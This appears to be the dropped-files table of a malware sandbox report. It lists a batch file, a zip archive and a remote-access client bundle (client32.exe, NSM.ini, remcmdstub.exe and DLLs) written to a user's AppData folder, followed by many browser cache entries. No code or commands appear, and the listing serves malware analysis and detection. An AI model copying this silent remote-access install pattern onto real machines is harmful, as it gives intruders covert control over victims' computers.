Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\ProgramData\cvcv.bat
|
ASCII text, with very long lines (41053)
|
dropped
|
 |
|
|
C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\client32.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\djalji\adtw.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\djalji\avutil-59.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\djalji\libopus-0.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\djalji\pnf1.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\hw.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\kustai\adtw.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\kustai\avutil-59.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\kustai\libopus-0.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\kustai\pnf1.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\msvcr100.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\pcicapi.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\zojtai\adtw.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\zojtai\avutil-59.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\zojtai\libopus-0.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\zojtai\pnf1.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Dire\NSM.LIC
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Dire\NSM.ini
|
Generic INItialization configuration [Features]
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Dire\PCICHEK.DLL
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Dire\client32.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Dire\nskbfltr.inf
|
Windows setup INFormation
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 1280x1024, components
3
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\gety.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
Chrome Cache Entry: 215
|
gzip compressed data, from Unix, original size modulo 2^32 484
|
dropped
|
||
|
Chrome Cache Entry: 216
|
data
|
dropped
|
||
|
Chrome Cache Entry: 217
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 218
|
gzip compressed data, from Unix, original size modulo 2^32 18852
|
dropped
|
||
|
Chrome Cache Entry: 219
|
gzip compressed data, from Unix, original size modulo 2^32 1581
|
dropped
|
||
|
Chrome Cache Entry: 220
|
PNG image data, 300 x 299, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 221
|
PNG image data, 40 x 20, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 222
|
gzip compressed data, from Unix, original size modulo 2^32 612499
|
dropped
|
||
|
Chrome Cache Entry: 223
|
gzip compressed data, from Unix, original size modulo 2^32 1497
|
dropped
|
||
|
Chrome Cache Entry: 224
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 225
|
JPEG image data, JFIF standard 1.02, resolution (DPI), density 600x600, segment length 16, baseline, precision 8, 3017x3204,
components 3
|
dropped
|
||
|
Chrome Cache Entry: 226
|
gzip compressed data, from Unix, original size modulo 2^32 4506
|
dropped
|
||
|
Chrome Cache Entry: 227
|
JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106,
resolutionunit=2, software=Adobe Photoshop 22.2 (Windows), datetime=2024:01:08 16:18:55], baseline, precision 8, 2185x305,
components 3
|
dropped
|
||
|
Chrome Cache Entry: 228
|
gzip compressed data, from Unix, original size modulo 2^32 713
|
dropped
|
||
|
Chrome Cache Entry: 229
|
gzip compressed data, from Unix, original size modulo 2^32 1091
|
dropped
|
||
|
Chrome Cache Entry: 230
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 231
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 232
|
gzip compressed data, max compression, original size modulo 2^32 49264
|
dropped
|
||
|
Chrome Cache Entry: 233
|
gzip compressed data, from Unix, original size modulo 2^32 22205
|
dropped
|
||
|
Chrome Cache Entry: 234
|
gzip compressed data, from Unix, original size modulo 2^32 526
|
dropped
|
||
|
Chrome Cache Entry: 235
|
gzip compressed data, from Unix, original size modulo 2^32 1488
|
dropped
|
||
|
Chrome Cache Entry: 236
|
PNG image data, 1903 x 773, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 237
|
PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 238
|
gzip compressed data, from Unix, original size modulo 2^32 275
|
dropped
|
||
|
Chrome Cache Entry: 239
|
gzip compressed data, from Unix, original size modulo 2^32 96
|
dropped
|
||
|
Chrome Cache Entry: 240
|
gzip compressed data, from Unix, original size modulo 2^32 13172
|
dropped
|
||
|
Chrome Cache Entry: 241
|
gzip compressed data, from Unix, original size modulo 2^32 28356
|
dropped
|
||
|
Chrome Cache Entry: 242
|
HTML document, Unicode text, UTF-8 text, with very long lines (1136)
|
dropped
|
||
|
Chrome Cache Entry: 243
|
PNG image data, 1449 x 587, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 244
|
JPEG image data, JFIF standard 1.02, resolution (DPI), density 600x600, segment length 16, baseline, precision 8, 3017x3204,
components 3
|
dropped
|
||
|
Chrome Cache Entry: 245
|
gzip compressed data, from Unix, original size modulo 2^32 825
|
dropped
|
||
|
Chrome Cache Entry: 246
|
PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 247
|
gzip compressed data, from Unix, original size modulo 2^32 4637
|
dropped
|
||
|
Chrome Cache Entry: 248
|
PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 249
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 250
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 251
|
PNG image data, 300 x 298, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 252
|
gzip compressed data, from Unix, original size modulo 2^32 1412
|
dropped
|
||
|
Chrome Cache Entry: 253
|
gzip compressed data, from Unix, original size modulo 2^32 20471
|
dropped
|
||
|
Chrome Cache Entry: 254
|
gzip compressed data, from Unix, original size modulo 2^32 10066
|
dropped
|
||
|
Chrome Cache Entry: 255
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 256
|
PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 257
|
gzip compressed data, from Unix, original size modulo 2^32 18538
|
dropped
|
||
|
Chrome Cache Entry: 258
|
gzip compressed data, from Unix, original size modulo 2^32 1198
|
dropped
|
||
|
Chrome Cache Entry: 259
|
PNG image data, 300 x 299, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 260
|
PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 261
|
gzip compressed data, from Unix, original size modulo 2^32 365
|
dropped
|
||
|
Chrome Cache Entry: 262
|
gzip compressed data, from Unix, original size modulo 2^32 466
|
dropped
|
||
|
Chrome Cache Entry: 263
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 264
|
PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 265
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 266
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 267
|
gzip compressed data, from Unix, original size modulo 2^32 6834
|
dropped
|
||
|
Chrome Cache Entry: 268
|
RIFF (little-endian) data, Web/P image, VP8 encoding, 480x360, Suserng: [none]x[none], YUV color, decoders should clamp
|
dropped
|
||
|
Chrome Cache Entry: 269
|
gzip compressed data, from Unix, original size modulo 2^32 324
|
dropped
|
||
|
Chrome Cache Entry: 270
|
PNG image data, 1903 x 773, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 271
|
data
|
dropped
|
||
|
Chrome Cache Entry: 272
|
HTML document, Unicode text, UTF-8 text, with very long lines (1136)
|
dropped
|
||
|
Chrome Cache Entry: 273
|
gzip compressed data, from Unix, original size modulo 2^32 789
|
dropped
|
||
|
Chrome Cache Entry: 274
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 275
|
gzip compressed data, from Unix, original size modulo 2^32 506
|
dropped
|
||
|
Chrome Cache Entry: 276
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=1, copyright=Katarzyna Bialasiewicz Photographee.eu],
baseline, precision 8, 1000x667, components 3
|
dropped
|
||
|
Chrome Cache Entry: 277
|
gzip compressed data, from Unix, original size modulo 2^32 4418
|
dropped
|
||
|
Chrome Cache Entry: 278
|
PNG image data, 300 x 298, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 279
|
RIFF (little-endian) data, Web/P image, VP8 encoding, 480x360, Suserng: [none]x[none], YUV color, decoders should clamp
|
dropped
|
||
|
Chrome Cache Entry: 280
|
gzip compressed data, from Unix, original size modulo 2^32 19526
|
dropped
|
||
|
Chrome Cache Entry: 281
|
gzip compressed data, from Unix, original size modulo 2^32 1526
|
dropped
|
||
|
Chrome Cache Entry: 282
|
gzip compressed data, from Unix, original size modulo 2^32 5588
|
dropped
|
||
|
Chrome Cache Entry: 283
|
gzip compressed data, from Unix, original size modulo 2^32 3931
|
dropped
|
||
|
Chrome Cache Entry: 284
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 285
|
gzip compressed data, from Unix, original size modulo 2^32 272
|
dropped
|
||
|
Chrome Cache Entry: 286
|
RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x720, Suserng: [none]x[none], YUV color, decoders should clamp
|
dropped
|
||
|
Chrome Cache Entry: 287
|
gzip compressed data, from Unix, original size modulo 2^32 1684
|
dropped
|
||
|
Chrome Cache Entry: 288
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 68x68, components
3
|
dropped
|
||
|
Chrome Cache Entry: 289
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 290
|
PNG image data, 300 x 299, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 291
|
gzip compressed data, from Unix, original size modulo 2^32 163
|
dropped
|
||
|
Chrome Cache Entry: 292
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 293
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 294
|
gzip compressed data, from Unix, original size modulo 2^32 277
|
dropped
|
||
|
Chrome Cache Entry: 295
|
gzip compressed data, from Unix, original size modulo 2^32 4159
|
dropped
|
||
|
Chrome Cache Entry: 296
|
gzip compressed data, from Unix, original size modulo 2^32 16717
|
dropped
|
||
|
Chrome Cache Entry: 297
|
gzip compressed data, from Unix, original size modulo 2^32 728
|
dropped
|
||
|
Chrome Cache Entry: 298
|
gzip compressed data, from Unix, original size modulo 2^32 5659
|
dropped
|
||
|
Chrome Cache Entry: 299
|
gzip compressed data, from Unix, original size modulo 2^32 404
|
dropped
|
||
|
Chrome Cache Entry: 300
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 301
|
gzip compressed data, from Unix, original size modulo 2^32 549
|
dropped
|
||
|
Chrome Cache Entry: 302
|
gzip compressed data, from Unix, original size modulo 2^32 6235
|
dropped
|
||
|
Chrome Cache Entry: 303
|
gzip compressed data, from Unix, original size modulo 2^32 4305
|
dropped
|
||
|
Chrome Cache Entry: 304
|
PNG image data, 300 x 301, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 305
|
data
|
dropped
|
||
|
Chrome Cache Entry: 306
|
Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
|
dropped
|
||
|
Chrome Cache Entry: 307
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 308
|
gzip compressed data, from Unix, original size modulo 2^32 244375
|
dropped
|
||
|
Chrome Cache Entry: 309
|
gzip compressed data, from Unix, original size modulo 2^32 4153
|
dropped
|
||
|
Chrome Cache Entry: 310
|
gzip compressed data, from Unix, original size modulo 2^32 3481
|
dropped
|
||
|
Chrome Cache Entry: 311
|
gzip compressed data, from Unix, original size modulo 2^32 12028
|
dropped
|
||
|
Chrome Cache Entry: 312
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x720, components
3
|
dropped
|
||
|
Chrome Cache Entry: 313
|
data
|
dropped
|
||
|
Chrome Cache Entry: 314
|
gzip compressed data, from Unix, original size modulo 2^32 8624
|
dropped
|
||
|
Chrome Cache Entry: 315
|
gzip compressed data, from Unix, original size modulo 2^32 23093
|
dropped
|
||
|
Chrome Cache Entry: 316
|
PNG image data, 300 x 301, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 317
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components
3
|
dropped
|
||
|
Chrome Cache Entry: 318
|
PNG image data, 1903 x 773, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 319
|
PNG image data, 300 x 299, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 320
|
PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 321
|
HTML document, Unicode text, UTF-8 text, with very long lines (1136)
|
dropped
|
||
|
Chrome Cache Entry: 322
|
gzip compressed data, from Unix, original size modulo 2^32 887
|
dropped
|
||
|
Chrome Cache Entry: 323
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 324
|
data
|
dropped
|
||
|
Chrome Cache Entry: 325
|
gzip compressed data, from Unix, original size modulo 2^32 960
|
dropped
|
||
|
Chrome Cache Entry: 326
|
gzip compressed data, from Unix, original size modulo 2^32 594
|
dropped
|
||
|
Chrome Cache Entry: 327
|
gzip compressed data, from Unix, original size modulo 2^32 19404
|
dropped
|
||
|
Chrome Cache Entry: 328
|
gzip compressed data, from Unix, original size modulo 2^32 287
|
dropped
|
||
|
Chrome Cache Entry: 329
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 330
|
PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 331
|
gzip compressed data, from Unix, original size modulo 2^32 991
|
dropped
|
||
|
Chrome Cache Entry: 332
|
gzip compressed data, from Unix, original size modulo 2^32 6362
|
dropped
|
||
|
Chrome Cache Entry: 333
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x720, components
3
|
dropped
|
||
|
Chrome Cache Entry: 334
|
PNG image data, 300 x 302, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 335
|
gzip compressed data, from Unix, original size modulo 2^32 208
|
dropped
|
||
|
Chrome Cache Entry: 336
|
data
|
dropped
|
||
|
Chrome Cache Entry: 337
|
gzip compressed data, from Unix, original size modulo 2^32 5248
|
dropped
|
||
|
Chrome Cache Entry: 338
|
gzip compressed data, from Unix, original size modulo 2^32 53568
|
dropped
|
||
|
Chrome Cache Entry: 339
|
gzip compressed data, from Unix, original size modulo 2^32 22297
|
dropped
|
||
|
Chrome Cache Entry: 340
|
PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 341
|
RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x720, Suserng: [none]x[none], YUV color, decoders should clamp
|
dropped
|
||
|
Chrome Cache Entry: 342
|
gzip compressed data, from Unix, original size modulo 2^32 270
|
dropped
|
||
|
Chrome Cache Entry: 343
|
data
|
dropped
|
||
|
Chrome Cache Entry: 344
|
gzip compressed data, from Unix, original size modulo 2^32 95
|
dropped
|
||
|
Chrome Cache Entry: 345
|
gzip compressed data, from Unix, original size modulo 2^32 19948
|
dropped
|
||
|
Chrome Cache Entry: 346
|
gzip compressed data, from Unix, original size modulo 2^32 127
|
dropped
|
||
|
Chrome Cache Entry: 347
|
gzip compressed data, from Unix, original size modulo 2^32 3743
|
dropped
|
||
|
Chrome Cache Entry: 348
|
gzip compressed data, from Unix, original size modulo 2^32 1743
|
dropped
|
||
|
Chrome Cache Entry: 349
|
gzip compressed data, from Unix, original size modulo 2^32 18660
|
dropped
|
||
|
Chrome Cache Entry: 350
|
PNG image data, 300 x 299, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 351
|
gzip compressed data, from Unix, original size modulo 2^32 527
|
dropped
|
||
|
Chrome Cache Entry: 352
|
PNG image data, 40 x 20, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 353
|
PNG image data, 300 x 302, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 354
|
data
|
dropped
|
||
|
Chrome Cache Entry: 355
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 356
|
gzip compressed data, from Unix, original size modulo 2^32 434
|
dropped
|
||
|
Chrome Cache Entry: 357
|
RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Suserng: [none]x[none], YUV color, decoders should clamp
|
dropped
|
||
|
Chrome Cache Entry: 358
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 359
|
PNG image data, 1903 x 773, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 360
|
gzip compressed data, from Unix, original size modulo 2^32 765
|
dropped
|
||
|
Chrome Cache Entry: 361
|
gzip compressed data, from Unix, original size modulo 2^32 557
|
dropped
|
||
|
Chrome Cache Entry: 362
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=1, copyright=Katarzyna Bialasiewicz Photographee.eu],
baseline, precision 8, 1000x667, components 3
|
dropped
|
||
|
Chrome Cache Entry: 363
|
gzip compressed data, from Unix, original size modulo 2^32 2863
|
dropped
|
||
|
Chrome Cache Entry: 364
|
RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Suserng: [none]x[none], YUV color, decoders should clamp
|
dropped
|
||
|
Chrome Cache Entry: 365
|
gzip compressed data, from Unix, original size modulo 2^32 249
|
dropped
|
||
|
Chrome Cache Entry: 366
|
gzip compressed data, from Unix, original size modulo 2^32 691
|
dropped
|
||
|
Chrome Cache Entry: 367
|
gzip compressed data, from Unix, original size modulo 2^32 8729
|
dropped
|
||
|
Chrome Cache Entry: 368
|
gzip compressed data, from Unix, original size modulo 2^32 307
|
dropped
|
||
|
Chrome Cache Entry: 369
|
gzip compressed data, from Unix, original size modulo 2^32 7761
|
dropped
|
||
|
Chrome Cache Entry: 370
|
gzip compressed data, from Unix, original size modulo 2^32 18983
|
dropped
|
||
|
Chrome Cache Entry: 371
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=1, copyright=Matej Kastelic], baseline, precision
8, 420x238, components 3
|
dropped
|
||
|
Chrome Cache Entry: 372
|
gzip compressed data, from Unix, original size modulo 2^32 655
|
dropped
|
||
|
Chrome Cache Entry: 373
|
data
|
dropped
|
||
|
Chrome Cache Entry: 374
|
JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106,
resolutionunit=2, software=Adobe Photoshop 22.2 (Windows), datetime=2024:01:08 16:18:55], baseline, precision 8, 2185x305,
components 3
|
dropped
|
||
|
Chrome Cache Entry: 375
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=19, height=1126, bps=242, PhotometricIntepretation=RGB,
description=professional mid age medical doctor using laptop in office, manufacturer=Canon, model=Canon EOS 5D Mark III, orientation=upper-left,
width=1688], baseline, precision 8, 1688x1126, components 3
|
dropped
|
||
|
Chrome Cache Entry: 376
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components
3
|
dropped
|
||
|
Chrome Cache Entry: 377
|
PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 378
|
gzip compressed data, from Unix, original size modulo 2^32 1753
|
dropped
|
||
|
Chrome Cache Entry: 379
|
PNG image data, 1449 x 587, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 380
|
gzip compressed data, from Unix, original size modulo 2^32 140
|
dropped
|
||
|
Chrome Cache Entry: 381
|
gzip compressed data, from Unix, original size modulo 2^32 1475
|
dropped
|
||
|
Chrome Cache Entry: 382
|
gzip compressed data, from Unix, original size modulo 2^32 1357
|
dropped
|
||
|
Chrome Cache Entry: 383
|
Web Open Font Format (Version 2), TrueType, length 18028, version 1.589
|
dropped
|
||
|
Chrome Cache Entry: 384
|
gzip compressed data, from Unix, original size modulo 2^32 588
|
dropped
|
||
|
Chrome Cache Entry: 385
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 386
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 387
|
gzip compressed data, from Unix, original size modulo 2^32 20297
|
dropped
|
||
|
Chrome Cache Entry: 388
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=1, copyright=Matej Kastelic], baseline, precision
8, 420x238, components 3
|
dropped
|
||
|
Chrome Cache Entry: 389
|
gzip compressed data, from Unix, original size modulo 2^32 22624
|
dropped
|
||
|
Chrome Cache Entry: 390
|
gzip compressed data, from Unix, original size modulo 2^32 116
|
dropped
|
||
|
Chrome Cache Entry: 391
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 392
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 393
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 394
|
GIF image data, version 89a, 800 x 598
|
dropped
|
||
|
Chrome Cache Entry: 395
|
gzip compressed data, from Unix, original size modulo 2^32 1046
|
dropped
|
||
|
Chrome Cache Entry: 396
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 397
|
PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 398
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 399
|
gzip compressed data, from Unix, original size modulo 2^32 20063
|
dropped
|
||
|
Chrome Cache Entry: 400
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 401
|
PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 402
|
gzip compressed data, from Unix, original size modulo 2^32 4615
|
dropped
|
||
|
Chrome Cache Entry: 403
|
gzip compressed data, from Unix, original size modulo 2^32 18128
|
dropped
|
||
|
Chrome Cache Entry: 404
|
gzip compressed data, from Unix, original size modulo 2^32 446
|
dropped
|
||
|
Chrome Cache Entry: 405
|
gzip compressed data, from Unix, original size modulo 2^32 402
|
dropped
|
||
|
Chrome Cache Entry: 406
|
PNG image data, 300 x 299, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 407
|
gzip compressed data, from Unix, original size modulo 2^32 916
|
dropped
|
||
|
Chrome Cache Entry: 408
|
data
|
dropped
|
||
|
Chrome Cache Entry: 409
|
gzip compressed data, from Unix, original size modulo 2^32 5924
|
dropped
|
||
|
Chrome Cache Entry: 410
|
gzip compressed data, from Unix, original size modulo 2^32 95
|
dropped
|
||
|
Chrome Cache Entry: 411
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 412
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 413
|
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=19, height=1126, bps=242, PhotometricIntepretation=RGB,
description=professional mid age medical doctor using laptop in office, manufacturer=Canon, model=Canon EOS 5D Mark III, orientation=upper-left,
width=1688], baseline, precision 8, 1688x1126, components 3
|
dropped
|
||
|
Chrome Cache Entry: 414
|
gzip compressed data, from Unix, original size modulo 2^32 2217
|
dropped
|
||
|
Chrome Cache Entry: 415
|
GIF image data, version 89a, 800 x 598
|
dropped
|
||
|
Chrome Cache Entry: 416
|
Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
|
dropped
|
||
|
Chrome Cache Entry: 417
|
data
|
dropped
|
||
|
Chrome Cache Entry: 418
|
gzip compressed data, from Unix, original size modulo 2^32 255
|
dropped
|
||
|
Chrome Cache Entry: 419
|
gzip compressed data, max compression, original size modulo 2^32 4272
|
dropped
|
||
|
Chrome Cache Entry: 420
|
gzip compressed data, from Unix, original size modulo 2^32 502
|
dropped
|
||
|
Chrome Cache Entry: 421
|
gzip compressed data, from Unix, original size modulo 2^32 1674
|
dropped
|
||
|
Chrome Cache Entry: 422
|
gzip compressed data, from Unix, original size modulo 2^32 1359
|
dropped
|
||
|
Chrome Cache Entry: 423
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 424
|
gzip compressed data, from Unix, original size modulo 2^32 8053
|
dropped
|
||
|
Chrome Cache Entry: 425
|
gzip compressed data, from Unix, original size modulo 2^32 87462
|
dropped
|
||
|
Chrome Cache Entry: 426
|
gzip compressed data, from Unix, original size modulo 2^32 726
|
dropped
|
||
|
Chrome Cache Entry: 427
|
gzip compressed data, from Unix, original size modulo 2^32 243
|
dropped
|
||
|
Chrome Cache Entry: 428
|
gzip compressed data, from Unix, original size modulo 2^32 5168
|
dropped
|
||
|
Chrome Cache Entry: 429
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 430
|
PNG image data, 146 x 45, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 431
|
gzip compressed data, from Unix, original size modulo 2^32 3196
|
dropped
|
||
|
Chrome Cache Entry: 432
|
gzip compressed data, from Unix, original size modulo 2^32 65621
|
dropped
|
||
|
Chrome Cache Entry: 433
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 68x68, components
3
|
dropped
|
||
|
Chrome Cache Entry: 434
|
ASCII text
|
dropped
